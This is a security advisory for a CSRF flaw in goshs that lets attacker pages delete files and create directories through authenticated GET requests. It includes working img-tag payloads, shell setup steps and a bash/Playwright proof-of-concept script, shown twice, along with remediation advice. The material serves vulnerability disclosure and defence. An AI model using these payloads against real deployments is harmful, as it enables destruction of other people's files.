GHSA-JRQ5-HG6X-J6G3

Vulnerability from github – Published: 2026-04-14 22:28 – Updated: 2026-04-15 21:17
VLAI?
Summary
goshs has CSRF in state-changing GET routes enables authenticated file deletion and directory creation
Details

Summary

goshs contains a cross-site request forgery issue in its state-changing HTTP GET routes. An external attacker can cause an already authenticated browser to trigger destructive actions such as ?delete and ?mkdir because goshs relies on HTTP basic auth alone and performs no CSRF, Origin, or Referer validation for those routes. I reproduced this on v2.0.0-beta.5.

Details

The vulnerable request handling is reachable through normal GET requests:

  • httpserver/handler.go:118-123 dispatches ?mkdir directly to handleMkdir()
  • httpserver/handler.go:180-186 dispatches ?delete directly to deleteFile()

Authentication is enforced only by HTTP basic auth:

  • httpserver/middleware.go:20-87 accepts any request that presents valid cached or replayed basic-auth credentials

The resulting state changes hit filesystem mutation sinks:

  • httpserver/handler.go:683-718 calls os.RemoveAll() in deleteFile()
  • httpserver/handler.go:961-1000 calls os.MkdirAll() in handleMkdir()

Because browsers can replay HTTP basic-auth credentials on subresource requests, an attacker-controlled page can embed:

  • <img src="http://127.0.0.1:18095/victim.txt?delete">
  • <img src="http://127.0.0.1:18095/csrfmade?mkdir">

If the victim has already authenticated to goshs, those requests are treated as legitimate authenticated actions and the server mutates the filesystem.

PoC

Manual verification commands used:

Terminal 1

cd '/Users/r1zzg0d/Documents/CVE hunting/targets/goshs_beta5'
go build -o /tmp/goshs_beta5 ./

rm -rf /tmp/goshs_csrf_root /tmp/goshs_csrf_site
mkdir -p /tmp/goshs_csrf_root /tmp/goshs_csrf_site
printf 'delete me\n' > /tmp/goshs_csrf_root/victim.txt

cat > /tmp/goshs_csrf_site/delete.html <<'HTML'
<!doctype html>
<html>
  <body>
    <img src="http://127.0.0.1:18095/victim.txt?delete">
  </body>
</html>
HTML

cat > /tmp/goshs_csrf_site/mkdir.html <<'HTML'
<!doctype html>
<html>
  <body>
    <img src="http://127.0.0.1:18095/csrfmade?mkdir">
  </body>
</html>
HTML

/tmp/goshs_beta5 -d /tmp/goshs_csrf_root -p 18095 -b 'u:p'

Terminal 2

python3 -m http.server 18889 --directory /tmp/goshs_csrf_site

Victim actions:

  1. Open http://127.0.0.1:18095/ in a browser and authenticate with u:p.
  2. Visit http://127.0.0.1:18889/delete.html.
  3. Visit http://127.0.0.1:18889/mkdir.html.

Two terminal commands I ran during local validation:

test -e /tmp/goshs_csrf_root/victim.txt && echo EXISTS || echo DELETED
test -d /tmp/goshs_csrf_root/csrfmade && echo CREATED || echo MISSING

Expected result:

  • the first check prints DELETED
  • the second check prints CREATED

PoC Video 1:

https://github.com/user-attachments/assets/94b78934-0a70-479f-9b89-43a859939473

Single-script verification:

'/Users/r1zzg0d/Documents/CVE hunting/output/poc/gosh_poc3'

Observed script result:

  • Delete status: DELETED
  • mkdir status: CREATED
  • [RESULT] VULNERABLE: attacker-controlled pages triggered authenticated state changes via GET

PoC Video 2:

https://github.com/user-attachments/assets/1143e039-81e4-4476-a1c3-f81ae46c9ede

gosh_poc3 script content:

#!/usr/bin/env bash
set -euo pipefail

REPO='/Users/r1zzg0d/Documents/CVE hunting/targets/goshs_beta5'
PLAY_DIR='/tmp/codex-playwright'
BIN='/tmp/goshs_beta5_csrf'
PORT='18095'
ATTACKER_PORT='18889'
CHROME='/Applications/Google Chrome.app/Contents/MacOS/Google Chrome'
WORKDIR="$(mktemp -d /tmp/goshs-csrf-beta5-XXXXXX)"
ROOT="$WORKDIR/root"
SITE="$WORKDIR/site"
GOSHS_PID=""
ATTACKER_PID=""

cleanup() {
  if [[ -n "${ATTACKER_PID:-}" ]]; then
    kill "${ATTACKER_PID}" >/dev/null 2>&1 || true
  fi
  if [[ -n "${GOSHS_PID:-}" ]]; then
    kill "${GOSHS_PID}" >/dev/null 2>&1 || true
  fi
}
trap cleanup EXIT

mkdir -p "$ROOT" "$SITE"
printf 'delete me\n' > "$ROOT/victim.txt"

cat > "$SITE/delete.html" <<HTML
<!doctype html>
<html>
  <body>
    <img src="http://127.0.0.1:${PORT}/victim.txt?delete">
  </body>
</html>
HTML

cat > "$SITE/mkdir.html" <<HTML
<!doctype html>
<html>
  <body>
    <img src="http://127.0.0.1:${PORT}/csrfmade?mkdir">
  </body>
</html>
HTML

echo "[1/6] Building goshs beta.5"
(cd "$REPO" && go build -o "$BIN" ./)

echo "[2/6] Starting goshs with HTTP basic auth"
"$BIN" -d "$ROOT" -p "$PORT" -b 'u:p' >"$WORKDIR/goshs.log" 2>&1 &
GOSHS_PID=$!

for _ in $(seq 1 40); do
  if curl -s -u u:p "http://127.0.0.1:${PORT}/" >/dev/null 2>&1; then
    break
  fi
  sleep 0.25
done

echo "[3/6] Serving attacker pages"
python3 -m http.server "$ATTACKER_PORT" --directory "$SITE" >"$WORKDIR/attacker.log" 2>&1 &
ATTACKER_PID=$!

if [[ ! -d "$PLAY_DIR/node_modules/playwright-core" ]]; then
  mkdir -p "$PLAY_DIR"
  (cd "$PLAY_DIR" && npm install --no-save playwright-core >/dev/null)
fi

if [[ ! -x "$CHROME" ]]; then
  echo "[ERROR] Chrome not found at $CHROME" >&2
  exit 1
fi

echo "[4/6] Visiting attacker pages from an authenticated browser"
node - <<'NODE'
const { chromium } = require('/tmp/codex-playwright/node_modules/playwright-core');

(async () => {
  const browser = await chromium.launch({
    headless: true,
    executablePath: '/Applications/Google Chrome.app/Contents/MacOS/Google Chrome',
  });
  const context = await browser.newContext({
    httpCredentials: { username: 'u', password: 'p' },
  });
  const page = await context.newPage();
  await page.goto('http://127.0.0.1:18095/', { waitUntil: 'domcontentloaded' });
  await page.goto('http://127.0.0.1:18889/delete.html', { waitUntil: 'domcontentloaded' });
  await page.waitForTimeout(1200);
  await page.goto('http://127.0.0.1:18889/mkdir.html', { waitUntil: 'domcontentloaded' });
  await page.waitForTimeout(1200);
  await browser.close();
})();
NODE

echo "[5/6] Verifying impact"
DELETE_STATUS="MISSING"
MKDIR_STATUS="MISSING"
if [[ ! -e "$ROOT/victim.txt" ]]; then
  DELETE_STATUS="DELETED"
fi
if [[ -d "$ROOT/csrfmade" ]]; then
  MKDIR_STATUS="CREATED"
fi

echo "[6/6] Results"
echo "Delete status: $DELETE_STATUS"
echo "mkdir status: $MKDIR_STATUS"

if [[ "$DELETE_STATUS" == "DELETED" && "$MKDIR_STATUS" == "CREATED" ]]; then
  echo '[RESULT] VULNERABLE: attacker-controlled pages triggered authenticated state changes via GET'
else
  echo '[RESULT] NOT REPRODUCED'
  exit 1
fi

Impact

This issue lets an external attacker abuse an authenticated victim's browser to perform filesystem mutations on the goshs server. In the demonstrated case, the attacker deletes an existing file and creates a new directory without the victim intentionally performing either action. Any deployment that relies on HTTP basic auth for web access is exposed to cross-site state changes when a user visits attacker-controlled content while authenticated.

Remediation

Suggested fixes:

  1. Move all state-changing functionality such as delete and mkdir off GET routes and require non-idempotent methods such as POST or DELETE.
  2. Add CSRF protections for authenticated browser actions, including per-request CSRF tokens plus strict Origin and Referer validation.
  3. Treat any rendered HTML content as untrusted and isolate it from issuing authenticated same-origin requests.
Severity ?
6.1 (Medium)
CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2.0.0-beta.5"
      },
      "package": {
        "ecosystem": "Go",
        "name": "github.com/patrickhener/goshs/v2"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.0.0-beta.4"
            },
            {
              "fixed": "2.0.0-beta.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-40883"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-352"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-14T22:28:44Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "### Summary\ngoshs contains a cross-site request forgery issue in its state-changing HTTP GET routes. An external attacker can cause an already authenticated browser to trigger destructive actions such as `?delete` and `?mkdir` because goshs relies on HTTP basic auth alone and performs no CSRF, `Origin`, or `Referer` validation for those routes. I reproduced this on `v2.0.0-beta.5`.\n\n### Details\nThe vulnerable request handling is reachable through normal GET requests:\n\n- `httpserver/handler.go:118-123` dispatches `?mkdir` directly to `handleMkdir()`\n- `httpserver/handler.go:180-186` dispatches `?delete` directly to `deleteFile()`\n\nAuthentication is enforced only by HTTP basic auth:\n\n- `httpserver/middleware.go:20-87` accepts any request that presents valid cached or replayed basic-auth credentials\n\nThe resulting state changes hit filesystem mutation sinks:\n\n- `httpserver/handler.go:683-718` calls `os.RemoveAll()` in `deleteFile()`\n- `httpserver/handler.go:961-1000` calls `os.MkdirAll()` in `handleMkdir()`\n\nBecause browsers can replay HTTP basic-auth credentials on subresource requests, an attacker-controlled page can embed:\n\n- `\u003cimg src=\"http://127.0.0.1:18095/victim.txt?delete\"\u003e`\n- `\u003cimg src=\"http://127.0.0.1:18095/csrfmade?mkdir\"\u003e`\n\nIf the victim has already authenticated to goshs, those requests are treated as legitimate authenticated actions and the server mutates the filesystem.\n\n### PoC\nManual verification commands used:\n\n`Terminal 1`\n\n```bash\ncd \u0027/Users/r1zzg0d/Documents/CVE hunting/targets/goshs_beta5\u0027\ngo build -o /tmp/goshs_beta5 ./\n\nrm -rf /tmp/goshs_csrf_root /tmp/goshs_csrf_site\nmkdir -p /tmp/goshs_csrf_root /tmp/goshs_csrf_site\nprintf \u0027delete me\\n\u0027 \u003e /tmp/goshs_csrf_root/victim.txt\n\ncat \u003e /tmp/goshs_csrf_site/delete.html \u003c\u003c\u0027HTML\u0027\n\u003c!doctype html\u003e\n\u003chtml\u003e\n  \u003cbody\u003e\n    \u003cimg src=\"http://127.0.0.1:18095/victim.txt?delete\"\u003e\n  \u003c/body\u003e\n\u003c/html\u003e\nHTML\n\ncat \u003e /tmp/goshs_csrf_site/mkdir.html \u003c\u003c\u0027HTML\u0027\n\u003c!doctype html\u003e\n\u003chtml\u003e\n  \u003cbody\u003e\n    \u003cimg src=\"http://127.0.0.1:18095/csrfmade?mkdir\"\u003e\n  \u003c/body\u003e\n\u003c/html\u003e\nHTML\n\n/tmp/goshs_beta5 -d /tmp/goshs_csrf_root -p 18095 -b \u0027u:p\u0027\n```\n\n`Terminal 2`\n\n```bash\npython3 -m http.server 18889 --directory /tmp/goshs_csrf_site\n```\n\nVictim actions:\n\n1. Open `http://127.0.0.1:18095/` in a browser and authenticate with `u:p`.\n2. Visit `http://127.0.0.1:18889/delete.html`.\n3. Visit `http://127.0.0.1:18889/mkdir.html`.\n\nTwo terminal commands I ran during local validation:\n\n```bash\ntest -e /tmp/goshs_csrf_root/victim.txt \u0026\u0026 echo EXISTS || echo DELETED\ntest -d /tmp/goshs_csrf_root/csrfmade \u0026\u0026 echo CREATED || echo MISSING\n```\n\nExpected result:\n\n- the first check prints `DELETED`\n- the second check prints `CREATED`\n\nPoC Video 1:\n\nhttps://github.com/user-attachments/assets/94b78934-0a70-479f-9b89-43a859939473\n\n\n\nSingle-script verification:\n\n```bash\n\u0027/Users/r1zzg0d/Documents/CVE hunting/output/poc/gosh_poc3\u0027\n```\n\nObserved script result:\n\n- `Delete status: DELETED`\n- `mkdir status: CREATED`\n- `[RESULT] VULNERABLE: attacker-controlled pages triggered authenticated state changes via GET`\n\nPoC Video 2:\n\nhttps://github.com/user-attachments/assets/1143e039-81e4-4476-a1c3-f81ae46c9ede\n\n\n\n`gosh_poc3` script content:\n\n```bash\n#!/usr/bin/env bash\nset -euo pipefail\n\nREPO=\u0027/Users/r1zzg0d/Documents/CVE hunting/targets/goshs_beta5\u0027\nPLAY_DIR=\u0027/tmp/codex-playwright\u0027\nBIN=\u0027/tmp/goshs_beta5_csrf\u0027\nPORT=\u002718095\u0027\nATTACKER_PORT=\u002718889\u0027\nCHROME=\u0027/Applications/Google Chrome.app/Contents/MacOS/Google Chrome\u0027\nWORKDIR=\"$(mktemp -d /tmp/goshs-csrf-beta5-XXXXXX)\"\nROOT=\"$WORKDIR/root\"\nSITE=\"$WORKDIR/site\"\nGOSHS_PID=\"\"\nATTACKER_PID=\"\"\n\ncleanup() {\n  if [[ -n \"${ATTACKER_PID:-}\" ]]; then\n    kill \"${ATTACKER_PID}\" \u003e/dev/null 2\u003e\u00261 || true\n  fi\n  if [[ -n \"${GOSHS_PID:-}\" ]]; then\n    kill \"${GOSHS_PID}\" \u003e/dev/null 2\u003e\u00261 || true\n  fi\n}\ntrap cleanup EXIT\n\nmkdir -p \"$ROOT\" \"$SITE\"\nprintf \u0027delete me\\n\u0027 \u003e \"$ROOT/victim.txt\"\n\ncat \u003e \"$SITE/delete.html\" \u003c\u003cHTML\n\u003c!doctype html\u003e\n\u003chtml\u003e\n  \u003cbody\u003e\n    \u003cimg src=\"http://127.0.0.1:${PORT}/victim.txt?delete\"\u003e\n  \u003c/body\u003e\n\u003c/html\u003e\nHTML\n\ncat \u003e \"$SITE/mkdir.html\" \u003c\u003cHTML\n\u003c!doctype html\u003e\n\u003chtml\u003e\n  \u003cbody\u003e\n    \u003cimg src=\"http://127.0.0.1:${PORT}/csrfmade?mkdir\"\u003e\n  \u003c/body\u003e\n\u003c/html\u003e\nHTML\n\necho \"[1/6] Building goshs beta.5\"\n(cd \"$REPO\" \u0026\u0026 go build -o \"$BIN\" ./)\n\necho \"[2/6] Starting goshs with HTTP basic auth\"\n\"$BIN\" -d \"$ROOT\" -p \"$PORT\" -b \u0027u:p\u0027 \u003e\"$WORKDIR/goshs.log\" 2\u003e\u00261 \u0026\nGOSHS_PID=$!\n\nfor _ in $(seq 1 40); do\n  if curl -s -u u:p \"http://127.0.0.1:${PORT}/\" \u003e/dev/null 2\u003e\u00261; then\n    break\n  fi\n  sleep 0.25\ndone\n\necho \"[3/6] Serving attacker pages\"\npython3 -m http.server \"$ATTACKER_PORT\" --directory \"$SITE\" \u003e\"$WORKDIR/attacker.log\" 2\u003e\u00261 \u0026\nATTACKER_PID=$!\n\nif [[ ! -d \"$PLAY_DIR/node_modules/playwright-core\" ]]; then\n  mkdir -p \"$PLAY_DIR\"\n  (cd \"$PLAY_DIR\" \u0026\u0026 npm install --no-save playwright-core \u003e/dev/null)\nfi\n\nif [[ ! -x \"$CHROME\" ]]; then\n  echo \"[ERROR] Chrome not found at $CHROME\" \u003e\u00262\n  exit 1\nfi\n\necho \"[4/6] Visiting attacker pages from an authenticated browser\"\nnode - \u003c\u003c\u0027NODE\u0027\nconst { chromium } = require(\u0027/tmp/codex-playwright/node_modules/playwright-core\u0027);\n\n(async () =\u003e {\n  const browser = await chromium.launch({\n    headless: true,\n    executablePath: \u0027/Applications/Google Chrome.app/Contents/MacOS/Google Chrome\u0027,\n  });\n  const context = await browser.newContext({\n    httpCredentials: { username: \u0027u\u0027, password: \u0027p\u0027 },\n  });\n  const page = await context.newPage();\n  await page.goto(\u0027http://127.0.0.1:18095/\u0027, { waitUntil: \u0027domcontentloaded\u0027 });\n  await page.goto(\u0027http://127.0.0.1:18889/delete.html\u0027, { waitUntil: \u0027domcontentloaded\u0027 });\n  await page.waitForTimeout(1200);\n  await page.goto(\u0027http://127.0.0.1:18889/mkdir.html\u0027, { waitUntil: \u0027domcontentloaded\u0027 });\n  await page.waitForTimeout(1200);\n  await browser.close();\n})();\nNODE\n\necho \"[5/6] Verifying impact\"\nDELETE_STATUS=\"MISSING\"\nMKDIR_STATUS=\"MISSING\"\nif [[ ! -e \"$ROOT/victim.txt\" ]]; then\n  DELETE_STATUS=\"DELETED\"\nfi\nif [[ -d \"$ROOT/csrfmade\" ]]; then\n  MKDIR_STATUS=\"CREATED\"\nfi\n\necho \"[6/6] Results\"\necho \"Delete status: $DELETE_STATUS\"\necho \"mkdir status: $MKDIR_STATUS\"\n\nif [[ \"$DELETE_STATUS\" == \"DELETED\" \u0026\u0026 \"$MKDIR_STATUS\" == \"CREATED\" ]]; then\n  echo \u0027[RESULT] VULNERABLE: attacker-controlled pages triggered authenticated state changes via GET\u0027\nelse\n  echo \u0027[RESULT] NOT REPRODUCED\u0027\n  exit 1\nfi\n```\n\n### Impact\nThis issue lets an external attacker abuse an authenticated victim\u0027s browser to perform filesystem mutations on the goshs server. In the demonstrated case, the attacker deletes an existing file and creates a new directory without the victim intentionally performing either action. Any deployment that relies on HTTP basic auth for web access is exposed to cross-site state changes when a user visits attacker-controlled content while authenticated.\n\n### Remediation\nSuggested fixes:\n\n1. Move all state-changing functionality such as `delete` and `mkdir` off GET routes and require non-idempotent methods such as `POST` or `DELETE`.\n2. Add CSRF protections for authenticated browser actions, including per-request CSRF tokens plus strict `Origin` and `Referer` validation.\n3. Treat any rendered HTML content as untrusted and isolate it from issuing authenticated same-origin requests.",
  "id": "GHSA-jrq5-hg6x-j6g3",
  "modified": "2026-04-15T21:17:55Z",
  "published": "2026-04-14T22:28:44Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/patrickhener/goshs/security/advisories/GHSA-jrq5-hg6x-j6g3"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/patrickhener/goshs"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "goshs has CSRF in state-changing GET routes enables authenticated file deletion and directory creation"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.